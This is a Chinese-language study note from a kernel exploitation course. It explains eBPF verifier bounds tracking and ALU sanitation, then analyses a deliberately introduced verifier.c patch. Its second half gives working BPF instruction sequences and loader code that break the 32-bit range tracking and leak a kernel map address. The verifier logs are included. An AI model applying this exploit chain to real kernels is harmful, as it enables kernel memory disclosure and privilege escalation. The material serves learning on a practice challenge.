ebpf的利用

发表于 2022-12-10 更新于 2022-12-11 分类于知识学习阅读次数：

本文记录跟随 ptr-yudai PAWNYABLE 学习的 ebpf 相关内容。

verifier

ebpf 的 verifier 对指令的检查主要分为两个阶段，其中第二个阶段会针对所有寄存器的值追踪其类型和范围，如下的情况将不会通过检查：

使用未初始化的寄存器
返回内核空间的指针
讲内核空间的指针写到 BPF 映射上
非法的指针读写

其中对于寄存器常量的跟踪是基于范围的跟踪。对于每个寄存器，记录其在该时间节点上取值的最大值和最小值。这一点和 v8 很像。例如 R0 += R1，R0 与 R1 分别取 [10, 20]，[-2, 2]，那么经过计算后的 R0 的值的范围就是 [8, 22]。这种行为在 adjust_reg_min_max_vals 和 adjust_scalar_min_max_vals 函数中定义。

在不知道具体数值的分析过程中，常常在抽象的范围内推断出数值。如果你不以合理的方式进行抽象，解释的结果可能是错误的。v8 中的很多漏洞也都是由于推断优化出现错误，进而导致 oob 等。

对于数值范围的跟踪，verifier 为每个寄存器保留并跟踪以下的数值：

变量	含义
umin_value, umax_value	64位无符号整数的最小值和最大值
smin_value, smax_value	64位有符号整数的最小值和最大值
u32_min_value, u32_max_value	32位无符号整数的最小值和最大值
s32_min_value, s32_max_value	32位有符号整数的最小值和最大值
var_off	寄存器中每个位的信息（已知具体数值的位）

var_off 是一个叫做 tnum 的结构，它包括一个 mask 和一个 value。mask 是值未知的比特的位置，而值是已知比特位置的值。

struct tnum {
	u64 value;
	u64 mask;
};

例如从一个 BPF 映射中取一个 64 位的值，最初所有位都是未知的，所以 var_off 是：

1	(mask=0xffffffffffffffff; value=0x0)

下面的例子是将 0xffff0000 与上述寄存器按位与，与 0 相与的部分为 0，所以：

1	(mask=0xffff0000; value=0x0)

如果此时再相加 0x12345，由于低十六位已知为 0：

1	(mask=0x1ffff0000; value=0x2345)

这将是一种情况。请注意，mask 已经增加了一个，以考虑到进位的可能性（不知道这么理解对不对）。此时的umin_value、umax_value、u32_min_value 和 u32_max_value 分别为 0x1ffff0000、0x1ffff2345、0xffff0000和0xffff2345。

现在看具体实现，在 BPF_ADD 的情况下，寄存器被更新如下：

case BPF_ADD:
	scalar32_min_max_add(dst_reg, &src_reg);
	scalar_min_max_add(dst_reg, &src_reg);
	dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
	break;

在scalar_min_max_add中，考虑到整数溢出等因素，通过范围计算实现，具体如下：

static void scalar_min_max_add(struct bpf_reg_state *dst_reg,
			       struct bpf_reg_state *src_reg)
{
	s64 smin_val = src_reg->smin_value;
	s64 smax_val = src_reg->smax_value;
	u64 umin_val = src_reg->umin_value;
	u64 umax_val = src_reg->umax_value;

	if (signed_add_overflows(dst_reg->smin_value, smin_val) ||
	    signed_add_overflows(dst_reg->smax_value, smax_val)) {
		dst_reg->smin_value = S64_MIN;
		dst_reg->smax_value = S64_MAX;
	} else {
		dst_reg->smin_value += smin_val;
		dst_reg->smax_value += smax_val;
	}
	if (dst_reg->umin_value + umin_val < umin_val ||
	    dst_reg->umax_value + umax_val < umax_val) {
		dst_reg->umin_value = 0;
		dst_reg->umax_value = U64_MAX;
	} else {
		dst_reg->umin_value += umin_val;
		dst_reg->umax_value += umax_val;
	}
}

这是 struct bpf_reg_state 的结构

struct bpf_reg_state {
	/* Ordering of fields matters.  See states_equal() */
	enum bpf_reg_type type;
	/* Fixed part of pointer offset, pointer types only */
	s32 off;
	union {
		/* valid when type == PTR_TO_PACKET */
		int range;

		/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
		 *   PTR_TO_MAP_VALUE_OR_NULL
		 */
		struct {
			struct bpf_map *map_ptr;
			/* To distinguish map lookups from outer map
			 * the map_uid is non-zero for registers
			 * pointing to inner maps.
			 */
			u32 map_uid;
		};

		/* for PTR_TO_BTF_ID */
		struct {
			struct btf *btf;
			u32 btf_id;
		};

		u32 mem_size; /* for PTR_TO_MEM | PTR_TO_MEM_OR_NULL */

		/* Max size from any of the above. */
		struct {
			unsigned long raw1;
			unsigned long raw2;
		} raw;

		u32 subprogno; /* for PTR_TO_FUNC */
	};
	/* For PTR_TO_PACKET, used to find other pointers with the same variable
	 * offset, so they can share range knowledge.
	 * For PTR_TO_MAP_VALUE_OR_NULL this is used to share which map value we
	 * came from, when one is tested for != NULL.
	 * For PTR_TO_MEM_OR_NULL this is used to identify memory allocation
	 * for the purpose of tracking that it's freed.
	 * For PTR_TO_SOCKET this is used to share which pointers retain the
	 * same reference to the socket, to determine proper reference freeing.
	 */
	u32 id;
	/* PTR_TO_SOCKET and PTR_TO_TCP_SOCK could be a ptr returned
	 * from a pointer-cast helper, bpf_sk_fullsock() and
	 * bpf_tcp_sock().
	 *
	 * Consider the following where "sk" is a reference counted
	 * pointer returned from "sk = bpf_sk_lookup_tcp();":
	 *
	 * 1: sk = bpf_sk_lookup_tcp();
	 * 2: if (!sk) { return 0; }
	 * 3: fullsock = bpf_sk_fullsock(sk);
	 * 4: if (!fullsock) { bpf_sk_release(sk); return 0; }
	 * 5: tp = bpf_tcp_sock(fullsock);
	 * 6: if (!tp) { bpf_sk_release(sk); return 0; }
	 * 7: bpf_sk_release(sk);
	 * 8: snd_cwnd = tp->snd_cwnd;  // verifier will complain
	 *
	 * After bpf_sk_release(sk) at line 7, both "fullsock" ptr and
	 * "tp" ptr should be invalidated also.  In order to do that,
	 * the reg holding "fullsock" and "sk" need to remember
	 * the original refcounted ptr id (i.e. sk_reg->id) in ref_obj_id
	 * such that the verifier can reset all regs which have
	 * ref_obj_id matching the sk_reg->id.
	 *
	 * sk_reg->ref_obj_id is set to sk_reg->id at line 1.
	 * sk_reg->id will stay as NULL-marking purpose only.
	 * After NULL-marking is done, sk_reg->id can be reset to 0.
	 *
	 * After "fullsock = bpf_sk_fullsock(sk);" at line 3,
	 * fullsock_reg->ref_obj_id is set to sk_reg->ref_obj_id.
	 *
	 * After "tp = bpf_tcp_sock(fullsock);" at line 5,
	 * tp_reg->ref_obj_id is set to fullsock_reg->ref_obj_id
	 * which is the same as sk_reg->ref_obj_id.
	 *
	 * From the verifier perspective, if sk, fullsock and tp
	 * are not NULL, they are the same ptr with different
	 * reg->type.  In particular, bpf_sk_release(tp) is also
	 * allowed and has the same effect as bpf_sk_release(sk).
	 */
	u32 ref_obj_id;
	/* For scalar types (SCALAR_VALUE), this represents our knowledge of
	 * the actual value.
	 * For pointer types, this represents the variable part of the offset
	 * from the pointed-to object, and is shared with all bpf_reg_states
	 * with the same id as us.
	 */
	struct tnum var_off;
	/* Used to determine if any memory access using this register will
	 * result in a bad access.
	 * These refer to the same value as var_off, not necessarily the actual
	 * contents of the register.
	 */
	s64 smin_value; /* minimum possible (s64)value */
	s64 smax_value; /* maximum possible (s64)value */
	u64 umin_value; /* minimum possible (u64)value */
	u64 umax_value; /* maximum possible (u64)value */
	s32 s32_min_value; /* minimum possible (s32)value */
	s32 s32_max_value; /* maximum possible (s32)value */
	u32 u32_min_value; /* minimum possible (u32)value */
	u32 u32_max_value; /* maximum possible (u32)value */
	/* parentage chain for liveness checking */
	struct bpf_reg_state *parent;
	/* Inside the callee two registers can be both PTR_TO_STACK like
	 * R1=fp-8 and R2=fp-8, but one of them points to this function stack
	 * while another to the caller's stack. To differentiate them 'frameno'
	 * is used which is an index in bpf_verifier_state->frame[] array
	 * pointing to bpf_func_state.
	 */
	u32 frameno;
	/* Tracks subreg definition. The stored value is the insn_idx of the
	 * writing insn. This is safe because subreg_def is used before any insn
	 * patching which only happens after main verification finished.
	 */
	s32 subreg_def;
	enum bpf_reg_liveness live;
	/* if (!precise && SCALAR_VALUE) min/max/tnum don't affect safety */
	bool precise;
};

这样的更新过程是针对所有操作实现的。32/64 位的加减乘除、移位等。计算值的范围用于检查偏移量是否落在了堆栈和上下文等内存访问的范围内。

例如，堆栈的范围检查在 check_stack_access_within_bounds 中定义，如果已知该值恒定，也就是立即数的情况下，就进行正常的偏移量检查。如果不知道具体数值，就检查偏移量可能用的最大值和最小值：

/* Returns true if @a is a known constant */
static inline bool tnum_is_const(struct tnum a)
{
	return !a.mask;
}

/* Check that the stack access at 'regno + off' falls within the maximum stack
 * bounds.
 *
 * 'off' includes `regno->offset`, but not its dynamic part (if any).
 */
static int check_stack_access_within_bounds(···) {
    ···
    if (tnum_is_const(reg->var_off)) {
        min_off = reg->var_off.value + off;
        if (access_size > 0)
            max_off = min_off + access_size - 1;
        else
            max_off = min_off;
    } else {
        if (reg->smax_value >= BPF_MAX_VAR_OFF ||
            reg->smin_value <= -BPF_MAX_VAR_OFF) {
            verbose(env, "invalid unbounded variable-offset%s stack R%d\n",
                    err_extra, regno);
            return -EACCES;
        }
        min_off = reg->smin_value + off;
        if (access_size > 0)
            max_off = reg->smax_value + off + access_size - 1;
        else
            max_off = min_off;
    }
    ···
}

然后得到的值就会被用作范围检查，先检查最小值是否越界，再检查最大值：

1
2
3

err = check_stack_slot_within_bounds(min_off, state, type);
if (!err)
    err = check_stack_slot_within_bounds(max_off, state, type);

这种跟踪寄存器和变量的取值范围的方式也经常被用于 BPF 之外的 JIT 中，因为 JIT 只需要优化和速度。

ALU(Arithmetic Logic Unit) sanitation

到目前为止描述的类型检查和范围追踪是验证器的工作，但由于利用eBPF的攻击越来越多，近年来引入了一种新的缓解机制，称为 ALU sanitation。

攻击发生在 verifier 猜测错误，而引起了 oob。例如一个值实际为 32，但是 verifier 猜测为 0，那么就会触发 oob。

为了解决这些由于验证器错误导致的超范围引用，2019年引入了一种名为 ALU sanitation 的缓解机制。

在 ebpf 中，只有标量值的加减法被允许作为指针的一种操作。在 ALU sanitation 中，当标量值已知是指针和标量值相加的常数时，会被改写为常数操作 BPF_ALUxx_IMM。例如，假设 R1 是一个指向映射的指针；R2 是一个标量值的寄存器，猜测值为 0，实际为 1。这种情况下：

1	BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2)

因为 verifier 认为 R2 是一个常数 0，所以被改为：

1	BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 0)

该补丁最初是为了防止名为 Spectre 的侧信道攻击，但它对利用 verifier 漏洞的攻击也很有效。

此外，如果标量方不是常数，指令会使用 alu_limit 值进行修补。alu_limit 是一个数字，表示该指针最多可以增加或减少多少个值。 例如，如果指针指向一个大小为 0x10 的映射元素开始的第二个字节，并且由于 BPF_ADD 发生了与标量值的相加，alu_limit 即为 0xe。

和前面一样，考虑将标量值R2加到寄存器R1中，R1指向大小为0x10的地图元素开始的第二个字节：

1	BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG2)

在 ALU sanitation 中，这条指令的修补方法如下（BPF_REG_AX 是一个辅助寄存器）：

BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit),
BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg),
BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg),
BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0),
BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63),
BPF_ALU64_REG(BPF_AND, BPF_REG_AX, off_reg),

假设标量值 R2 超过了 0xe 的 alu_limit，但由于某些错误，验证器可能没有检测到它。但是在 ALU sanitation 中此时会产生了以下的指令序列：

BPF_MOV32_IMM(BPF_REG_AX, 0xe),
BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, BPF_REG_R2),
BPF_ALU64_REG(BPF_OR, BPF_REG_AX, BPF_REG_R2),
BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0),
BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63),
BPF_ALU64_REG(BPF_AND, BPF_REG_AX, BPF_REG_R2),

首先，前两条指令计算出 0xe-R2，如果 R2 在范围内，则为正数或零，如果超出范围则为负数；在下面的 OR 指令中，如果 AX 和 R2 的符号不同，最重要的符号位被设置为1。换句话说，当一个超范围的操作发生时，符号位在这时应该被设置为1；然后用 NEG 反转符号，用算术移位右移64位（像刷子带着符号位从左刷到右，如果 NEG 后是正的刷的都是 0，是负的刷的都是 1）；如果发生超范围引用，AX 被赋值为0，否则 AX 被赋值为 0xffffffffffffffffffffffffffff，最后，取 R2 和 AX 的 AND，这就是最终使用的偏移量。

补丁与源码分析

在作者提供的练习题目中，为了利用 ebpf 相关漏洞，人为打了一个补丁：

7957c7957,7958
<               __mark_reg32_known(dst_reg, var32_off.value);
---
>               // `scalar_min_max_or` will handler the case
>               //__mark_reg32_known(dst_reg, var32_off.value);

对 5.18.14 版本中 kernel/bpf/verifier.c#7957 进行了修改。

__mark_reg32_known 函数在 scalar32_min_max_or 函数的开始被调用，补丁将其注释掉了。那么就主要关心他的作用。

scalar32_min_max_or

该函数仅被调用一次，在 adjust_scalar_min_max_vals 函数中：

根据注释：

/* Calculate sign/unsigned bounds and tnum for alu32 and alu64 bit ops.
* There are two classes of instructions: The first class we track both
* alu32 and alu64 sign/unsigned bounds independently this provides the
* greatest amount of precision when alu operations are mixed with jmp32
* operations. These operations are BPF_ADD, BPF_SUB, BPF_MUL, BPF_ADD,
* and BPF_OR. This is possible because these ops have fairly easy to
* understand and calculate behavior in both 32-bit and 64-bit alu ops.
* See alu32 verifier tests for examples. The second class of
* operations, BPF_LSH, BPF_RSH, and BPF_ARSH, however are not so easy
* with regards to tracking sign/unsigned bounds because the bits may
* cross subreg boundaries in the alu64 case. When this happens we mark
* the reg unbounded in the subreg bound space and use the resulting
* tnum to calculate an approximation of the sign/unsigned bounds.
*/

该函数实现了 ALU 操作后目标寄存器的范围跟踪。

首先，目标寄存器 var_off 被更新为 tnum_or。实现方法很简单：如果要 OR 的两个比特都是未知的，那么结果也是未知的。即使其中一个位是未知的，掩码中的相应位也会被设置为0，因为如果另一个位是1的话，OR 的结果总是1：

#define TNUM(_v, _m)	(struct tnum){.value = _v, .mask = _m}

struct tnum tnum_or(struct tnum a, struct tnum b)
{
	u64 v, mu;

	v = a.value | b.value;
	mu = a.mask | b.mask;
	return TNUM(v, mu & ~v);
}

例如，将 (mask=0xffff0000; value=0x1001) 和 (mask=0xffffff00; value=0x2) 进行OR，结果是 (mask=0xffffef00; value=0x1003)。

一旦 var_off 被更新，有关的标量 scalar32_min_max_or 就被调用。当 src_known 和 dst_known 为真时，将达到 patch 中的删除部分：

bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
...
if (src_known && dst_known) {
    // `scalar_min_max_or` will handler the case
    //__mark_reg32_known(dst_reg, var32_off.value);
    return;
}

tnum_subreg_is_const 当寄存器的低32位部分是常数时，返回 true。 换句话说，__mark_reg32_known 原本应该在两个要被 OR 的寄存器的低 32 位都是常数时被调用。

__mark_reg32_known 使用常数 var_off 更新 s32_min_value, s32_max_value, u32_min_value 和 u32_max_value。

static void __mark_reg32_known(struct bpf_reg_state *reg, u64 imm)
{
	reg->var_off = tnum_const_subreg(reg->var_off, imm);
	reg->s32_min_value = (s32)imm;
	reg->s32_max_value = (s32)imm;
	reg->u32_min_value = (u32)imm;
	reg->u32_max_value = (u32)imm;
}

patch 的注释中提到scalar_min_max_or will handler the case，那就看一下该函数：

static void scalar_min_max_or(struct bpf_reg_state *dst_reg,
			      struct bpf_reg_state *src_reg)
{
	bool src_known = tnum_is_const(src_reg->var_off);
	bool dst_known = tnum_is_const(dst_reg->var_off);
	s64 smin_val = src_reg->smin_value;
	u64 umin_val = src_reg->umin_value;

	if (src_known && dst_known) {
		__mark_reg_known(dst_reg, dst_reg->var_off.value);
		return;
	}
    ...
}

这基本上就是一个 64 位版本的 scalar32_min_max_or。这里当两个 64 位的值都是常数时，__mark_reg_known 被调用。__mark_reg_known 除了 64 位的部分外，还将 32 位的范围改为常数（注意开头的下划线个数）：

/* This helper doesn't clear reg->id */
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	reg->var_off = tnum_const(imm);
	reg->smin_value = (s64)imm;
	reg->smax_value = (s64)imm;
	reg->umin_value = imm;
	reg->umax_value = imm;

	reg->s32_min_value = (s32)imm;
	reg->s32_max_value = (s32)imm;
	reg->u32_min_value = (u32)imm;
	reg->u32_max_value = (u32)imm;
}

/* Mark the unknown part of a register (variable offset or scalar value) as
 * known to have the value @imm.
 */
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
	/* Clear id, off, and union(map_ptr, range) */
	memset(((u8 *)reg) + sizeof(reg->type), 0,
	       offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
	___mark_reg_known(reg, imm);
}

换句话说，如果执行 OR 运算的两个 64 位寄存器都是常数，就不需要在 scalar32_min_max_or 中调用__mark_reg32_known，随后的 scalar_min_max_or 会使它们成为常数，不会有问题。

那么，如果一个 64 位寄存器的低 32 位是常数，而前 32 位不是恒定的呢？ scalar32_min_max_or 立即返回（因为他只检测低 32 位，都是常数就执行到 patch 处，而由于 patch 后只有 return 了所以直接返回）。而 __mark_reg_known 在 scalar_min_max_or 中肯定不会被调用。在这种情况下，会在 scalar_min_max_or 继续执行：

/* We get our maximum from the var_off, and our minimum is the
 * maximum of the operands' minima
 */
dst_reg->umin_value = max(dst_reg->umin_value, umin_val);
dst_reg->umax_value = dst_reg->var_off.value | dst_reg->var_off.mask;
if (dst_reg->smin_value < 0 || smin_val < 0) {
	/* Lose signed bounds when ORing negative numbers,
	 * ain't nobody got time for that.
	 */
	dst_reg->smin_value = S64_MIN;
	dst_reg->smax_value = S64_MAX;
} else {
	/* ORing two positives gives a positive, so safe to
	 * cast result into s64.
	 */
	dst_reg->smin_value = dst_reg->umin_value;
	dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg);

在更新 umin_value, umax_value, smin_value 和 smax_value 之后，调用 __update_reg_bounds：

static void __update_reg_bounds(struct bpf_reg_state *reg)
{
	__update_reg32_bounds(reg);
	__update_reg64_bounds(reg);
}

这里也对 32 位和 64 位的范围进行了更新。那么，这个补丁是否只是删除了不必要的处理？

__update_reg32_bounds

仔细看一下 __update_reg32_bounds 流程：

#define max_t(type, x, y)	max((type)x, (type)y)

static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
	struct tnum var32_off = tnum_subreg(reg->var_off);

	/* min signed is max(sign bit) | min(other bits) */
	reg->s32_min_value = max_t(s32, reg->s32_min_value,
			var32_off.value | (var32_off.mask & S32_MIN));
	/* max signed is min(sign bit) | max(other bits) */
	reg->s32_max_value = min_t(s32, reg->s32_max_value,
			var32_off.value | (var32_off.mask & S32_MAX));
	reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
	reg->u32_max_value = min(reg->u32_max_value,
				 (u32)(var32_off.value | var32_off.mask));
}

再回看一下 patch 的点：

case BPF_OR:
    dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
    scalar32_min_max_or(dst_reg, &src_reg);		//	==> patch: no __mark_reg32_known !
    scalar_min_max_or(dst_reg, &src_reg);
    break;

和上面一样，假设此时处理的 OR 的两个操作寄存器都是 64 位。由于 __mark_reg32_known 在 scalar32_min_max_or 没有被调用，32位的 min，max 仍然是旧状态。这是否可以用来导致最小、最大的不一致被更新？ 为了简单起见，先考虑无符号的情况：

1
2
3

reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
			 (u32)(var32_off.value | var32_off.mask));

现在，寄存器的低 32 位对于 src 和 dst 都是定值。因此，var32_off.mask 为 0，可以改写为：

1 2	reg->u32_min_value = max(reg->u32_min_value, var32_off.value); reg->u32_max_value = min(reg->u32_max_value, var32_off.value);

u32_min_value 和 u32_max_value 继承了目标寄存器的原始状态。下面的 32 位必须是常数，所以假设原来的u32_min_value 和 u32_max_value 都是 X（范围 [x,x] 即常数 x）。此时某个常数 Y 与之或，结果是 X|Y。那么，如果 X|Y > X，那么：

1 2	reg->u32_min_value = max(X, X\|Y); // min=X\|Y reg->u32_max_value = min(X, X\|Y); // max=X

此时 u32_min_value 大于 u32_max_value ，出现不一致。

漏洞利用

漏洞再现

为了简单起见，假设 X=0，Y=1（分别为 R1，R2 的低位）。首先，准备以下寄存器R1和R2：

1 2	R1: var_off=(value=0; mask=0xffffffff00000000) R2: var_off=(value=0xfffffffe00000001; mask=0)

让我们看看与 BPF_OR(R1, R2) 进行 OR 时的变化。

var_off=(value=0xfffffffe00000001; mask=0x100000000) (计算方式在上面 tnum_or)
u32_min_value = max(0, 1) = 1
u32_max_value = min(0, 1) = 0

这就在 32 位部分创建了一个最小值为1、最大值为0的危险的寄存器。让我们在实际代码中检查一下

int mapfd = map_create(8, 1);
char verifier_log[0x10000];
unsigned long val;

struct bpf_insn insns[] = 
{
    // R0 => &map[0]
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // key=0
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -8),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), // map_lookup_elem(mapfd, &k)
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // R1 --> var_off=(value=0; mask=0xffffffff00000000)
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32),

    // R2 --> var_off=(value=0xfffffffe00000001; mask=0)
    BPF_MOV64_IMM(BPF_REG_2, 0xFFFFFFFE),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),

    // R1 --> (s32_min=1, s32_max=0, u32_min=1, u32_max=0)
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),

    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

在内核中跑起该程序并打印输出：

下载后在 ubuntu20.04 中直接 run.sh 起不来，搜索了一下，找到了解决办法，ok

/ $ ./exp
func#0 @0
0: R1=ctx(off=0,imm=0) R10=fp0
0: (7a) *(u64 *)(r10 -8) = 0          ; R10=fp0 fp-8_w=mmmmmmmm
1: (18) r1 = 0x0                      ; R1_w=map_ptr(off=0,ks=4,vs=8,imm=0)
3: (bf) r2 = r10                      ; R2_w=fp0 R10=fp0
4: (07) r2 += -8                      ; R2_w=fp-8
5: (85) call bpf_map_lookup_elem#1    ; R0_w=map_value_or_null(id=1,off=0,ks=4,vs=8,imm=0)
6: (55) if r0 != 0x0 goto pc+1        ; R0_w=P0
7: (95) exit

from 6 to 8: R0=map_value(off=0,ks=4,vs=8,imm=0) R10=fp0 fp-8=mmmmmmmm
8: (79) r1 = *(u64 *)(r0 +0)          ; R0=map_value(off=0,ks=4,vs=8,imm=0) R1_w=Pscalar()
9: (77) r1 >>= 32                     ; R1_w=Pscalar(umax=4294967295,var_off=(0x0; 0xffffffff))
10: (67) r1 <<= 32                    ; R1_w=Pscalar(smax=9223372032559808512,umax=18446744069414584320,var_off=(0x0; 0xffffffff00000000),s32_min=0,s32_max=0,u32_max=0)
11: (b7) r2 = -2                      ; R2_w=P-2
12: (67) r2 <<= 32                    ; R2_w=P-8589934592
13: (07) r2 += 1                      ; R2_w=P-8589934591
14: (4f) r1 |= r2                     ; R1_w=Pscalar(umin=18446744065119617025,umax=18446744069414584321,var_off=(0xfffffffe00000001; 0x100000000),s32_min=1,s32_max=0,u32_min=1,u32_max=0) R2_w=P-8589934591
15: (b7) r0 = 0                       ; R0_w=P0
16: (95) exit
processed 16 insns (limit 1000000) max_states_per_insn 0 total_states 1 peak_states 1 mark_read 1

第十四条指令运行完：

1	s32_min=1,s32_max=0,u32_min=1,u32_max=0

此时印证了前面的分析，出现了有问题的范围跟踪。

地址泄露

如果像前面提到的那样，创建了 min_value > max_value 的条件，有几种方法可以利用它。首先，让我们把它用于映射中的地址泄漏。

在 eBPF 中允许对标量值进行加减，也允许对指针进行加减。对指针和标量值的操作中的偏移更新是在adjust_ptr_min_max_vals 中实现的：

static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
			struct bpf_insn *insn,
			const struct bpf_reg_state *ptr_reg,
			const struct bpf_reg_state *off_reg)
{

...

	bool known = tnum_is_const(off_reg->var_off);
	s64 smin_val = off_reg->smin_value, smax_val = off_reg->smax_value,
	    smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
	u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
	    umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;

...

	if ((known && (smin_val != smax_val || umin_val != umax_val)) ||
		smin_val > smax_val || umin_val > umax_val) {
		/* Taint dst register if offset had invalid bounds derived from
		 * e.g. dead branches.
		*/
		__mark_reg_unknown(env, dst_reg);
		return 0;
	}
    ...
}

上面的代码显示，在标量值方面的跟踪被破坏的情况下，就像本例一样，计算结果被 __mark_reg_unknown 变成了未知的。也就是说，如果你把一个指针加到一个有跟踪破坏的寄存器上，计算的结果会被当作一个标量值来处理。标量值可以写入 BPF 映射，以此来进行地址泄露。让我们用 map_lookup_elem 获得的 BPF 映射的指针泄漏。

之前破坏了对 s32_min_value 等的推测。但是上面的代码需要破坏 64 位的寄存器，如 smin_val。要把一个对 32 位值的不准确推测扩展为 64 位值的不准确推测，只需使用 BPF_MOV32_REG 把它复制到一个 32 位的寄存器中，就像在 x86-64 中一样（没太理解什么意思，反正就照做了）：

struct bpf_insn insns[] = 
{
    // R0 => &map[0]
    BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x08, 0), // key=0
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -8),
    BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), // map_lookup_elem(mapfd, &k)
    BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
    BPF_EXIT_INSN(),

    // R1 --> var_off=(value=0; mask=0xffffffff00000000)
    BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_0, 0),
    BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32),

    // R2 --> var_off=(value=0xfffffffe00000001; mask=0)
    BPF_MOV64_IMM(BPF_REG_2, 0xFFFFFFFE),
    BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32),
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1),

    // R1 --> (s32_min=1, s32_max=0, u32_min=1, u32_max=0)
    BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2),

    // R1 --> scalar
    BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_1),

    BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x10),
    BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
    BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x08), // key
    BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),    
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x10), // value
    BPF_MOV64_IMM(BPF_REG_ARG4, 0),              // flags
    BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

    BPF_MOV64_REG(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
};

union bpf_attr prog_attr = 
{
    .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
    .insn_cnt = sizeof(insns) / sizeof(insns[0]),
    .insns = (uint64_t)insns,
    .license = (uint64_t)"GPL v2",
    .log_level = 2,
    .log_size = sizeof(verifier_log),
    .log_buf = (uint64_t)verifier_log,
};

int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
if (progfd == -1) fatal("[-] bpf(BPF_PROG_LOAD)");

int socks[2];
if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) 
    fatal("socketpair");
if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int)))
    fatal("setsockopt");

write(socks[1], "Hello", 5);

printf("%s\n", verifier_log);

val = 0;
map_lookup(mapfd, 0, &val);
printf("0x%lx\n", val);

如果能成功泄露地址，则如下图所示，注意 R1 中原本有个 1，所以泄露的指针值加了 1：

这个地址显示，它正确地包含了数组的第一个元素（泄露的数据）：

调试方式

待调试的进程用 getchar() 挂住，gdb 直接 target remote localhost:port 即可。

-0x110 是找到带有数据的 BPF 映射的开始。这是因为 bpf_array 结构的存在。例如最前面的 0xffffffff81c124a0 就是 bpf_map 结构中的函数表 ops（记住这个东西，后面泄露内核基址的时候可以用到）。虽然在这种情况下没有使用，但 eBPF 攻击还包括一种重写这个 ops 的方法，以提升权限。保留 BPF 映射的地址，因为它使随后的 kASLR 泄漏更容易。如果把它变成一个函数，这样当你传递 map 的 fd（结尾处减去1）时，它就会返回地址，这样的代码就比较干净。

bpf_map 结构体

struct bpf_map {
	/* The first two cachelines with read-mostly members of which some
	 * are also accessed in fast-path (e.g. ops, max_entries).
	 */
	const struct bpf_map_ops *ops ____cacheline_aligned;
	struct bpf_map *inner_map_meta;
#ifdef CONFIG_SECURITY
	void *security;
#endif
	enum bpf_map_type map_type;
	u32 key_size;
	u32 value_size;
	u32 max_entries;
	u64 map_extra; /* any per-map-type extra fields */
	u32 map_flags;
	int spin_lock_off; /* >=0 valid offset, <0 error */
	int timer_off; /* >=0 valid offset, <0 error */
